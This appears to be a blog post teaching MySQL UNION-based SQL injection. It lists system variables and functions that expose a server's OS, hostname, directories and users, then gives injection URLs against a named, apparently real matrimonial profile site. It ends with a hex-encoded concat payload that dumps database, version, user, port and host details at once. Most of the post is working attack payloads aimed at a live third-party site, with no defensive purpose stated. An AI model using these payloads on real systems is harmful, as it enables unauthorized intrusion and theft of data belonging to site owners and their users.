Today I will Show you how to Print Multiple Variable and Functions in SQL injection:
Here Is the Cheat Sheet Of Multi Functions on SCreen :
@@port : Check Ports
@@version_compile_os : Check which Operationg system is running
@@CHARACTER_SET_FILESYSTEM : tell File system :
@@version_compile_machine : Check 32 bit/64 bit
@@hostname : Current Hostname
@@tmpdir : Tept Directory
@@datadir : Data Directory
@@version : Version of DB
@@basedir : Base Directory
user() : Current User
database() : Current Database
version() : Version
schema() : current Database
UUID() : System UUID key
current_user() : Current User
current_user : Current User
system_user() : Current Sustem user
session_user() : Session user
@@GLOBAL.have_symlink : Check if Symlink Enabled or Disabled
@@GLOBAL.have_ssl : Check if it have ssl or not
Procedure :
For this Purpose We shoul have Vulnerable site :
http://www.pelli.co.in/view_profile_byid.php?id=-15180 +/*!50000UNION*/+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35
Here u can See Lot of Vlunerable Columns::
Now Going to print Database ,Version() ,User() ,@@ port etC ::
-----------------------------------------------------------------------------------------------------------------------
- http://www.pelli.co.in/view_profile_byid.php?id=-15180 +/*!50000UNION*/+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,database(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35
- http://www.pelli.co.in/view_profile_byid.php?id=-15180 +/*!50000UNION*/+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35
- http://www.pelli.co.in/view_profile_byid.php?id=-15180 +/*!50000UNION*/+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,user(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35
Now going To Print All functions At once for this Purpose We will use Concat ,Concat_ws, Or Make_set
----------------------------------------------------------------------------------------------------------------------
concat(0x3c666f6e7420636f6c6f723d7265643e3c62723e,0x3c62723e,0x7e7e696e6a6563742062792041666768616e697e7e3c2f666f6e743e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c75653e64617461626173653d3d3c2f666f6e743e,0x3c666f6e7420636f6c6f723d677265656e3e,database(),0x3c2f666f6e743e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c75653e76657273696f6e3d3d3c2f666f6e743e,0x3c666f6e7420636f6c6f723d677265656e3e,version(),0x3c2f666f6e743e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c75653e757365723d3d3c2f666f6e743e,0x3c666f6e7420636f6c6f723d677265656e3e,user(),0x3c2f666f6e743e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c75653e506f72743d3d3c2f666f6e743e,0x3c666f6e7420636f6c6f723d677265656e3e,@@port,0x3c2f666f6e743e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c75653e4f533d3d3c2f666f6e743e,0x3c666f6e7420636f6c6f723d677265656e3e,@@version_compile_os,0x3c2f666f6e743e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c75653e424954532044455441494c533d3c2f666f6e743e,0x3c666f6e7420636f6c6f723d626c75653e,@@version_compile_machine,0x3c666f6e7420636f6c6f723d677265656e3e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c75653e46494c452053595354454d3d3c2f666f6e743e,0x3c666f6e7420636f6c6f723d677265656e3e,@@CHARACTER_SET_FILESYSTEM,0x3c2f666f6e743e,0x3c62723e,0x3c62723e,0x686f73746e616d653d3d,@@hostname,0x3c62723e,0x53797374656d2075756964206b65793d3d,UUID(),0x3c62723e,0x73796d6c696e6b3d3d,@@GLOBAL.have_symlink,0x3c62723e,0x53534c3d3d,@@GLOBAL.have_ssl,0x3c62723e,0x426173656469726563746f72793d3d,@@basedir)--------------------------------------------------------------------------------------------------------------------------
Result::
--------------------------------------------------------------------------------------------------------------------------
How to coloring Watch This Video :::
-----------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------
Download Hackbar New Version From Here HAckBAR
------------------------------------------------------------------------------------------------------------------
No comments:
Post a Comment